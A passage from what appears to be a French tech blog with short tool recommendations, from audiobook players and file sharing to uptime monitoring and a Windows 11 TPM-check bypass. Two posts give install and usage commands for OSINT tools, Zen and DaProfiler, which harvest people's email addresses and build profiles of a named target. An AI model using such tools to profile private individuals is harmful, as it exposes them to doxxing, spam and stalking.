Ainsi, plus d’excuse pour ne pas correctement protéger vos secrets.

En savoir plus.

Si vous êtes Linuxien et que vous aimez les livres audio, j’ai un bon petit soft à vous recommander. Il s’agit de Cozy, un lecteur dédié aux audiobooks qui apporte pas mal de confort.

Déjà, au niveau la présentation, vous verrez tous vos livres audios classés par auteur, nom ou par date d’ajout. Cozy supporte de nombreux formats sans DRM (MP3, M4a…etc).

Ensuite, au niveau de la lecture, pour vous lire votre livre en accéléré mais surtout, vous pouvez mettre un minuteur pour stopper la lecture au bout de X minutes ou à la fin d’un chapitre. Pratique pour ne pas se laisser embarquer dans une histoire sans fin. Mais surtout, si c’est le soir avant de vous endormir, vous pouvez également programmer la mise en veille ou l’extinction de votre PC.

Un mode offline permet également de conserver une copie du livre audio en cours, ce qui est pratique si vous stocker vos livres sur un disque réseaux (genre votre NAS).

Par contre, dommage, il y avait une version pour macOS mais elle n’est pas maintenue à jour par manque de moyens. Donc si vous avez des compétences sur macOS, prenez contact avec les porteurs du projet Cozy pour proposer une version pour les ordinateur Apple.

Cozy est dispo sur un tas de distrib Linux ici et vous pouvez aussi l’installer directement en passant par Flathub.

Vous voulez partager des fichiers entre 2 appareils que ce soit un smartphone ou un PC Linux / Windows, mais vous n’avez pas grand-chose sous la main.

Alors bien sûr il y a ShareDrop que vous avez découvert ici, mais ShareDrop nécessite d’avoir Internet. Car oui, la solution que je vous propose vous permet de partager des fichiers entre appareils connectés sur le même réseau Wifi, mais même si vous n’avez pas de Wifi et pas Internet, vous pourrez quand même y arriver avec le partage de connexion (hotspot) de votre smartphone.

Il vous suffit d’installer Sharik sur l’ordinateur ou le smartphone qui doit expédier le fichier puis de le recevoir sur l’autre appareil, soit avec une autre application Sharik, soit directement en entrant l’URL communiquée par l’outil dans un navigateur. Ainsi, vous pouvez partager des images, des fichiers, des applications installées ou simplement du texte.

Et voilà. C’est hyper simple, l’outil est dispo dans toutes les langues, sur tous les OS (sauf macOS, qui n’est pas dispo encore, mais osef puisqu’on peut quand même recevoir des trucs si on le souhaite).

Sharik est entièrement gratuit, open source et vous pourrez y contribuer en vous rendant sur sa page Github.

Vous pouvez télécharger Sharik pour :

• Android sur le PlayStore
• Android sur F-Droid
• iOS sur l’App Store
• Et les autres versions Windows et Linux sont ici (et pour les APK, Appimage, .deb, .zip, .exe et code source, tout est ici)

Vous vous souvenez de Cloud9 qui permettait d’avoir un IDE (environnement de dev) dans le navigateur pour coder depuis n’importe où ?

Et bien même si le service a été absorbé par Amazon, je ne l’ai pas oublié.

Alors je vous laisse imaginer mon plaisir lorsque j’ai découvert VSCode.dev qui n’est ni plus ni moins qu’un portage de Visual Studio Code dans le navigateur.

Alors bien sûr, on est à des années-lumière de Cloud9 puisqu’on ne peut pas lancer le code pour le débugger. On est là, face à un simple éditeur, mais comme les navigateurs récents supportent l’API File System Access, il est possible d’accéder à vos fichiers locaux depuis le browser.

Ainsi, avec VSCode.dev vous pourrez par exemple visualiser et éditer des fichiers locaux, prendre des notes en markdown, créer des app full HTML, JS, CSS côté client en utilisant les outils de debug du navigateur pour votre débogage. Il est même possible d’ouvrir des dépôts Git directement depuis l’éditeur.

VSCode.dev est ainsi parfaitement adapté pour éditer du code sur des machines peu performantes ou qui ne font pas tourner VSCode comme les Chromebook ou les iPad.

À découvrir ici.

Vous êtes entouré de gens qui ne comprennent rien à l’informatique et vous voulez leur en mettre plein les yeux ?

Alors, devenez hacker !

Trop compliqué, me direz-vous ? Que nenni !

Car oui, grâce au site GeekTyper, vous pouvez passer votre navigateur en plein écran et adopter un environnement de bureau totalement faux aux couleurs de la NSA, de Mr Robot, Umbrella Corp ou Militech.

GeekTyper permet de lancer des applications très flippantes de cracking de mots de passe, de coding à la vitesse de la lumière et autres machins qui font des lignes de commande automatiquement pendant que vous tapez sur votre clavier.

De quoi vous faire passer pour ce que vous n’êtes pas 🙂 En tout cas, il y a de quoi faire de bonnes blagues.

Un petit tour d’horizon en vidéo…

De mon côté, j’ai une grosse préférence pour l’ordinateur de Didier Raoult (lol) :

Le site est également disponible sous la forme d’un économiseur d’écran voire d’une application Windows si vous en faites un usage intensif. Et si votre truc, c’est de vous la raconter au bistrot, il y a également la version mobile sur Android.

GeekTyper c’est par ici.

Qu’ont en commun :

• Une soirée complètement bourrée
• Une élection présidentielle
• La recherche d’un travail de qualité
• Un youtubeur dans la sauce
• Un divorce compliqué

Vous ne voyez pas ?

Et bien c’est simple : L’absolue nécessité de nettoyer son compte Facebook avant que d’autres découvre un commentaire, une photo, un like… qui pourrait être retourné contre son auteur.

Et pour faire ça, rien de mieux que l’outil libre « Facebook Delete » qui permet de supprimer les contenus de votre choix (les likes, les commentaires, les posts…etc) aux dates de votre choix, sans vous fatiguer et sans avoir à supprimer tout votre compte Facebook.

L’outil est développé en Go et vous pouvez récupérer les sources ici mais des binaires pour Linux, Windows et macOS sont également téléchargeables ici.

Une fois téléchargé, rendez ce binaire exécutable comme ceci :

chmod +x deleter-linux

et lancez le :

./deleter-linux

Pour le lancer directement depuis les sources, faites comme ceci :

git clone https://github.com/marcelja/facebook-delete.git
cd facebook-delete
go install
go run deleter.go

Et voilà ! Vous aurez un compte Facebook tout beau tout propre pour aller de l’avant !

Vous connaissez ces sites payants qui permettent de surveiller un site web ou n’importe quel service exposé sur Internet ?

Et bien, plus la peine de chercher ce genre de truc de monitoring à la Uptime Bot ou StatusPage, car il existe l’équivalent sous licence libre que vous pouvez déployer sur votre propre serveur : Uptime Kuma.

Une fois en place sur un serveur, vous pouvez ajouter des sondes qui iront vérifier que le service que vous voulez surveiller répond bien toutes les X secondes / minutes. Et bien sûr, vous prévenir immédiatement dès que c’est inaccessible.

Uptime Kuma vous donnera le temps de réponse du dernier test, le temps de réponse moyen, le % d’uptime (disponibilité) sur 24h et sur 30 jours ainsi que la date d’expiration de votre certificat SSL.

De cette manière, vous pourrez donc contrôle la disponibilité des services en HTTP(s) / TCP / Ping / enregistrement DNS et Push. L’interface est plutôt jolie et vous pouvez le programmer pour recevoir des alertes via le service désiré : Telegram, Discord, Slack, email…etc.

Cerise sur le gâteau, une page de statut publique est également disponible pour que vous puissiez la communiquer aux gens qui ne peuvent plus se passer de vos services.

Ce script pour nodeJS peut s’installer dans un docker comme ceci :

docker volume create uptime-kuma

docker run -d --restart=always -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1

Et si Docker ce n’est pas votre truc, vous pouvez également l’installer comme ceci :

# Mettez à jour NPM
npm install npm -g

#Clonez le git du projet
git clone https://github.com/louislam/uptime-kuma.git
cd uptime-kuma
npm run setup

# Lancez le service comme ceci : 
node server/server.js

Ensuite, y’a plus qu’à lancer votre navigateur et à vous rendrez sur l’URL locale suivante :

http://localhost:3001

Et dans le même style, il existe également Monitorix qui n’est pas un personnage d’Astérix, mais bien un outil open source de monitoring ou encore Cachet que vous pouvez télécharger ici. Merci à TeicionX et Polyum, pour l’info.

Vous vous souvenez de cette vidéo dans laquelle je vous explique comment installer Windows 11 en contournant la vérification de TPM et SecureCheck sur votre ordinateur ?

Et bien voici une méthode encore plus simple avec l’outil Rufus que j’ai déjà présenté ici.

La première étape consiste à télécharger une ISO de Windows 11 sur le site de Microsoft. Ensuite, munissez vous d’une clé USB suffisamment grande (8 Go par exemple) et insérez là dans votre ordinateur.

Téléchargez Rufus ici et lancez-le.

Ensuite, sélectionnez votre périphérique, c’est-à-dire la clé USB sur laquelle sera déployée l’ISO, choisissez ensuite l’ISO de Windows 11 puis dans les options d’image, vous aurez alors le choix entre une installation classique pour les systèmes équipés de TPM 2.0, de SecureCheck et de +8GB de RAM ou une installation sur un ordinateur auquel il manque l’une de ces choses, normalement requises par Microsoft.

Et oui, c’est aussi simple que ça. Ensuite, cliquez sur le bouton « Démarrer » pour lancer le formatage de la clé et l’installation de l’ISO de Windows 11 sur celle-ci.

Si vous êtes plutôt amateur de Ventoy et que vous avez aimé mon tutoriel à ce sujet, sachez que ces derniers proposent également la possibilité de contourner les vérifications de Windows. Pour cela, il faudra utiliser le paramètre

"VTOY_WIN11_BYPASS_CHECK": "0"

dans la config de Ventoy. Vous aurez tous les détails ici.

Bonne installation !

Si vous cherchez un moyen simple de partager des idées à plusieurs pendant une conférence par exemple, rien de mieux qu’un bon schéma sur un tableau.

Browserboard est un service qui va vous permettre de dessiner à plusieurs sur un tableau blanc partagé. Une multitude d’outils sont disponibles comme des stylos, des surligneurs, des post-its, des flèches, des formes…etc.

Pas besoin de vous créer un compte, et le service est entièrement gratuit. À la création d’un tableau blanc, vous obtenez un lien unique que vous pouvez alors partager avec d’autres personnes.

Ensuite pour l’export, vous pouvez tout simplement sortir une image PNG de votre œuvre. Notez également que le service fonctionne aussi sur mobile.

À découvrir ici

Et dans le même style, il y a également Awwapp, WiteBoard et PixClip.

Merci à J0j0b4rj0 pour l’info

Pas de souci avec l’outil d’OSINT baptisé Zen qui scanne les dépôts publics Github et vous sort la liste de toutes les boites mail et pseudo des contributeurs au projet que vous visez. Attention, ça ne pirate rien… ça scanne simplement les dépôts et les pages Github à la recherche d’emails en clair.

Pour l’installer, faites un

git clone https://github.com/s0md3v/Zen.git

Puis placez-vous dans le répertoire

cd Zen

Et installez les dépendances :

pip install -r requirements.txt

Ensuite vient le moment d’utiliser le script. Si vous avez uniquement le pseudo de la personne et que vous voulez son mail, entrez simplement :

python zen.py username

Si vous avez l’URL du dépôt Github, c’est comme ça :

python zen.py https://github.com/username/repository

Et si vous ciblez une organisation / société précise, c’est cette commande qu’il vous faudra :

python zen.py organization --org

Il n’y a pas de limite mis à part le nombre de requêtes que vous pouvez adresser à Github à la minute. Si vous n’êtes pas authentifié sur le site, vous serez limité à 60 requêtes par heure. Authentifié, ce chiffre passe à 6000 requêtes par heure.

Zen permet de faire du multithreading histoire d’aller plus vite. Et vous pouvez même vérifier sur la base haveibeenpwned.com si tel ou tel email a été poutré.

python zen.py username --breach

Amusez-vous bien, mais ne faites pas de bêtise. Je vous rappelle que le spam est illégal. Et si votre email traine sur Github, pensez à l’enlever ou à en changer. Je vous invite à lire ce guide qui vous expliquera comment protéger vos données personnelles sur Github.

Si vous devez télécharger des fichiers depuis Google Drive en ligne de commande avec Curl ou Wget, il y a de fortes chances que cela échoue.

Pourquoi ? Et bien il semblerait que l’avertissement que Google envoie pour les fichiers dépassant une certaine taille soit bloquant pour ces outils.

Alors, comment faire ?

Et bien il existe un petit outil sous licence libre qui s’appelle Gdown qui permet de contourner le problème. Ainsi, grâce à GDown vous pourrez télécharger de gros fichiers depuis Google Drive en ligne de commande.

Elle n’est pas belle la vie ?

Pour installer GDown, ouvrez un terminal et entrez la commande suivante :

pip install gdown

Ensuite, entrez la commande gdown suivie de l’URL du fichier Google Drive :

gdown https://drive.google.com/uc?id=1l_5RK28JRL19wpT22B-DY9We3TVXnnQQ

Et voilà !

L’outil supporte également les URLs classiques qui ne sont pas des URL Google Drive, à la manière de n’importe quel Wget.

Un paramètre –fuzzy permet également de récupérer des répertoires complets de Google Drive ou des fichiers comme ce PowerPoint :

gdown --fuzzy "https://docs.google.com/presentation/d/15umvZKlsJ3094HNg5S4vJsIhxcFlyTeK/edit?usp=sharing&ouid=117512221203072002113&rtpof=true&sd=true"

Notez que Gdown peut également être importé en tant que lib dans vos scripts Python qui peut être très pratique.

Enjoy !

Merci à Laurent

Si vous voulez faire un peu de renseignements (OSINT), voici un script baptisé DaProfiler qui vous permet d’obtenir des emails, des comptes de médias sociaux, des adresses, les emplois et plus encore d’une votre cible.

Cet outil conçu pour la France uniquement, utilise notamment des techniques de web scraping et de Google dorking, pour trouver toutes ces infos et notamment les adresses e-mail de votre cible via des recherches sur Skype, Pinterest et à l’aide de combinaison de différentes adresses e-mail qu’il vérifie par la suite pour savoir si l’adresse e-mail existe ou non

DaProfiler est également capable de contrôler le contenu d’une biographie Instagram pour trouver des informations intéressantes telles que les adresses e-mail, les profils PayPal, la ville, l’école, l’âge, les hobbies et plus encore…

Évidemment, on parle ici uniquement de données disponibles publiquement sur Internet et cet outil n’est à utiliser qu’à des fins éducatives sur vos propres données.

Pour l’installer :

git clone https://github.com/TheRealDalunacrobate/DaProfiler.git
cd DaProfiler
pip install -r requirements.txt

L’UNESCO a à coeur de nous aider à protéger notre identité en ligne. Seulement, voilà, sans même nous en rendre compte, avec d’infimes détails, nous laissons chaque jour des tas de données durant nos séances de surfs. Les sujets qui nous animent, notre niveau de vie, nos habitudes, nos petits secrets…etc.

Et tout cela vient nourrir les bases de données des GAFAM et de leurs acolytes. Chaque donnée est ensuite analysée automatiquement par des systèmes d’IA (deep learning) qui peuvent ensuite nous cataloguer pour mieux nous servir de la publicité voire de l’information ciblée.

Dans ce cas, notre vie privée n’est pas réellement respectée et bien sûr comme pour le moment, il n’y a pas de cadre autour de l’éthique de l’intelligence artificielle, c’est un peu la fête ! Alors, comment sensibiliser les gens au sujet tout en frappant un grand coup pour que les politiques commencent à s’y intéresser ?

Et bien pour cela, l’UNESCO a mis au point la Cookie Factory, une extension Chrome qui va sauvegarder vos cookies, les supprimer et vous forger une toute nouvelle identité.

Je dois avouer que je n’ai jamais vu une extension aussi originale. C’est un vrai spectacle en image et en musique et je vous invite vraiment à la tester rien que pour le show. Ainsi vous pourrez choisir entre revêtir l’identité d’un fan de chats, d’un hacker, d’un multimillionnaire, d’un platiste, d’un fan de voiture…etc.

Chaque cookie a son parfum.

Évidemment, tout est réversible et vous pouvez retrouver à tout moment vos cookies d’origine, mais à quoi bon quand on peut incarner quelqu’un d’autre. Vous pouvez même créer un profil personnalisé… Devenez un homme, une femme, un(e) ado, adulte, sénior, fan de rap, de plongée sous-marine, de pâtisserie, de licornes, de danse classique…etc. Et

Ensuite, y’a plus qu’à surfer et voilà, vous ne serez plus la même personne aux yeux des algos. Très cool non ?

L’extension est disponible uniquement sous Chrome et vous pouvez la télécharger ici.

Une fois encore, je vous invite à la télécharger même si vous pensez ne pas en avoir besoin, ne serait que pour l’expérience. C’est un vrai show, j’ai adoré !

Bravo à l’UNESCO ainsi qu’à l’agence DDB Paris, c’est bien joué ! Puis maintenant que je suis une jeune fille multimillionnaire, fan de licorne et de combats de robots, je sens que ma vie numérique va basculer.

Voici un outil de scraping absolument bluffant qui se concentre sur l’extraction de données en provenance de Google Maps.

Imaginez que vous ayez un annuaire web à remplir ou un listing à consister à partir des données publiques de Google Maps.

Comment faire ? Tout recopier à la main ?

Bien sûr que non ! Grâce à l’extension G Map Extractor sous Chrome, vous pourrez à partir d’une simple requête, vous consister un fichier CSV contenant le nom, l’adresse, le code postal, le numéro de téléphone, le site web et les coordonnées géodésiques des lieux.

Par exemple, je suis ici sur la carte des Kebabs de Clermont-Ferrand… Je lance alors l’extension, j’entre ma requête…

« Kebab Clermont-Ferrand » … Et hop, les données vont commencer à être collectées automatiquement. On est bien dans un cas de scraping pur et dur. Pas sûr que ce soit approuvé par Google, mais vu qu’ils ont autorisé cette extension sur leur Chrome Store, j’imagine qu’ils s’en fichent.

Une fois les données extraites, y’a plus qu’à télécharger le CSV et voilà ! Vous aurez un beau fichier tout b